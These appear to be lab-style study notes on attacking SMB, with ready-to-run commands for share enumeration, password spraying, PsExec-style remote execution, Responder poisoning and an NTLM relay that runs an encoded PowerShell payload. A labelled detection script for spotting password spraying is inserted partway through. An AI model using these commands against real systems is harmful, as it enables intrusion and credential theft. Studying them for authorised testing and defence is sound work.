Attacking SMB
Overview
- Server Message Block (SMB) is a communication protocol for providing shared access to files and printers across nodes on a network.
- Originally designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138.
- Windows 2000+ can run SMB directly over TCP/IP on port 445 without the NetBIOS layer.
- Modern Windows uses SMB over TCP but supports NetBIOS as a failover.
- Samba is a Unix/Linux open-source implementation of SMB, allowing Linux/Unix servers and Windows clients to use the same SMB services.
Port Summary
| Port | Protocol | Description |
|---|---|---|
| 139/TCP | NetBIOS-SSN | SMB over NetBIOS |
| 445/TCP | Microsoft-DS | SMB over TCP/IP |
| 137/UDP | NetBIOS-NS | NetBIOS Name Service |
| 138/UDP | NetBIOS-DGM | NetBIOS Datagram |
Related Protocols
- MSRPC (Microsoft Remote Procedure Call): Provides a generic way to execute procedures in local or remote processes. RPC over SMB can use named pipes as its underlying transport.
Enumeration
Nmap Scanning
sudo nmap 10.129.14.128 -sV -sC -p139,445
Key information from scans:
- SMB version (e.g., Samba smbd 4.6.2)
- Hostname
- Operating system (inferred from SMB implementation)
- Message signing status
Misconfigurations
Null Session / Anonymous Authentication
- SMB can be configured to not require authentication.
- Allows access to shares, usernames, groups, permissions, policies, and services without credentials.
Tools supporting null session:
- smbclient
- smbmap
- rpcclient
- enum4linux
Listing Shares with smbclient
smbclient -L //10.10.11.45 -N
- -L: List shares
- -N: Use null session (no password)
Protocol-Specific Attacks
Brute Forcing vs Password Spraying
- Brute Forcing: Try many passwords against one account; high risk of triggering account lockout.
- Password Spraying: Try one password against many accounts; lower lockout risk.
- Recommended: 2-3 attempts with 30-60 minute waits between attempts.
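A detection-side counterpart to the distinction above, added here as an example and not part of the original notes: it parses constructed failed-logon lines (the line format and addresses are invented for the example, loosely modelled on the fields of a Windows 4625 audit-failure event) and labels each source as brute forcing, spraying, or benign, also reporting how long the activity was spread out.

```python
"""Separate brute forcing from password spraying in failed-logon records.
Added example for these notes, not code from the original page. The log line
format and addresses are constructed (loosely after Windows event 4625)."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(r"^(?P<ts>\S+) EventID=4625 SourceIP=(?P<src>\S+) Account=(?P<acct>\S+)$")

# Constructed sample: .50 hammers one account, .77 tries several accounts at
# most twice each with a 30-minute pause, .12 is a user mistyping a password.
SAMPLE_LOG = """\
2024-01-10T09:00:01Z EventID=4625 SourceIP=10.10.110.50 Account=jsmith
2024-01-10T09:00:02Z EventID=4625 SourceIP=10.10.110.50 Account=jsmith
2024-01-10T09:00:03Z EventID=4625 SourceIP=10.10.110.50 Account=jsmith
2024-01-10T10:00:00Z EventID=4625 SourceIP=10.10.110.77 Account=alice
2024-01-10T10:00:01Z EventID=4625 SourceIP=10.10.110.77 Account=bob
2024-01-10T10:00:02Z EventID=4625 SourceIP=10.10.110.77 Account=carol
2024-01-10T10:30:00Z EventID=4625 SourceIP=10.10.110.77 Account=alice
2024-01-10T10:30:01Z EventID=4625 SourceIP=10.10.110.77 Account=dave
2024-01-10T11:15:00Z EventID=4625 SourceIP=10.10.110.12 Account=frank
"""

def parse_failures(text):
    """Yield (datetime, source_ip, account); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"), m["src"], m["acct"]

def classify_sources(failures, brute_min=3, spray_min_accounts=4, spray_max_per_account=2):
    """Label each source: brute_force (one account hit >= brute_min times), password_spray
    (>= spray_min_accounts distinct accounts, none above spray_max_per_account attempts),
    else benign. span_minutes exposes slow sprays that pause to stay under lockout limits."""
    by_src = defaultdict(lambda: (defaultdict(int), []))  # src -> (per-account counts, times)
    for ts, src, acct in failures:
        by_src[src][0][acct] += 1
        by_src[src][1].append(ts)
    report = {}
    for src, (counts, times) in by_src.items():
        peak = max(counts.values())
        verdict = ("brute_force" if peak >= brute_min else
                   "password_spray" if len(counts) >= spray_min_accounts and peak <= spray_max_per_account
                   else "benign")
        report[src] = {"verdict": verdict, "accounts": len(counts), "peak_per_account": peak,
                       "span_minutes": round((max(times) - min(times)).total_seconds() / 60)}
    return report

if __name__ == "__main__":
    for src, info in classify_sources(parse_failures(SAMPLE_LOG)).items():
        print(src, info)
```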
Password Spraying with CrackMapExec
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
Flags:
- --continue-on-success: Continue spraying after a valid login is found
- --local-auth: Required for non-domain-joined computers
Windows SMB Attack Capabilities
With admin or privileged access:
- Remote Command Execution
- Extract Hashes from SAM Database
- Enumerate Logged-on Users
- Pass-the-Hash (PTH)
Remote Code Execution (RCE)
PsExec
- Executes processes on remote systems with full console interactivity.
- Deploys a Windows service to admin$ share on the remote machine.
- Uses DCE/RPC interface over SMB to access Windows Service Control Manager API.
Impacket Tools
- impacket-psexec: Python PsExec using RemComSvc
- impacket-smbexec: Similar to PsExec but without RemComSvc; uses a local SMB server to receive command output
- impacket-atexec: Executes commands through Task Scheduler service
Using impacket-psexec
impacket-psexec administrator:'Password123!'@10.10.110.17
CrackMapExec Command Execution
# CMD command
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# PowerShell command
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -X 'Get-Process'
Note: If --exec-method is not defined, CME tries atexec first, then smbexec.
Enumerating Logged-on Users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
Credential Capture with Responder
LLMNR/NBT-NS Poisoning
When a host cannot resolve a name through DNS, it works through the following sources, ending with a multicast query:
- Local hosts file
- Local DNS cache
- Configured DNS server
- Multicast query (LLMNR/NBT-NS)
Attackers can poison these multicast queries to capture credentials.
Running Responder
sudo responder -I ens33
Responder can poison:
- LLMNR
- NBT-NS
- DNS/MDNS
NTLM Relay Attacks
Using impacket-ntlmrelayx
# Dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
# Execute command
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <BASE64_PAYLOAD>'
Use https://www.revshells.com/ to generate reverse shell payloads.
RPC Attacks
Beyond enumeration, RPC can be used to:
- Change user passwords
- Create new domain users
- Create new shared folders
Tools:
- rpcclient
Tools Summary
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| smbclient | SMB share interaction |
| smbmap | SMB share enumeration |
| enum4linux | SMB enumeration |
| rpcclient | RPC enumeration and interaction |
| crackmapexec | Password spraying, command execution, enumeration |
| impacket-psexec | Remote command execution |
| impacket-smbexec | Remote command execution |
| impacket-atexec | Remote command execution via Task Scheduler |
| responder | LLMNR/NBT-NS poisoning |
| impacket-ntlmrelayx | NTLM relay attacks |